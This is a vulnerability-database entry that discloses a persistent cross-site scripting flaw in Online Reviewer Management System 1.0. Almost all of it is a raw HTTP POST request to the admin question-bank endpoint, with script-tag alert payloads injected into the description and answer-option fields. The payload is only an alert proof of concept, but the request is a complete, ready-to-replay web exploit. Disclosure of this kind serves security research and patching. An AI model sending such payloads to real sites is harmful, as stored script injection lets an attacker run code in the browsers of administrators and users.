Tuesday, March 23, 2021

Online Reviewer Management System 1.0 Cross Site Scripting

# Exploit Title: Online Reviewer Management System Persistent Cross Site Scripting
# Exploit Author: th3d1gger
# Vendor Homepage: https://sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/reviewer_0.zip
# Version: 1.0
# Tested on Windows 10


@attack request

POST /admins/assessments/databank/btn_functions.php?action=add HTTP/1.1

Host: reviewmngmnt.olly

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------28762627066859903521570508233

Content-Length: 1574

Origin: http://reviewmngmnt.olly


Connection: close

Referer: http://reviewmngmnt.olly/admins/assessments/databank/index.php

Cookie: PHPSESSID=3he3in87240vbdqshdfu75b7qi

Upgrade-Insecure-Requests: 1



-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="difficulty_id"



1

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="test_desc"



Agriculture

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="test_subject"



Animal Science

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="description"



<script>alert("yeassss")</script>

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="option_a"



<script>alert("yeassss")</script>

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="option_b"



<script>alert("yeassss")</script>

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="option_c"



<script>alert("yeassss")</script>

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="option_d"



<script>alert("yeassss")</script>

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="answer"



A

-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="personImage"; filename=""

Content-Type: application/octet-stream





-----------------------------28762627066859903521570508233

Content-Disposition: form-data; name="btnAddQuestion"



Save

-----------------------------28762627066859903521570508233--
 

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated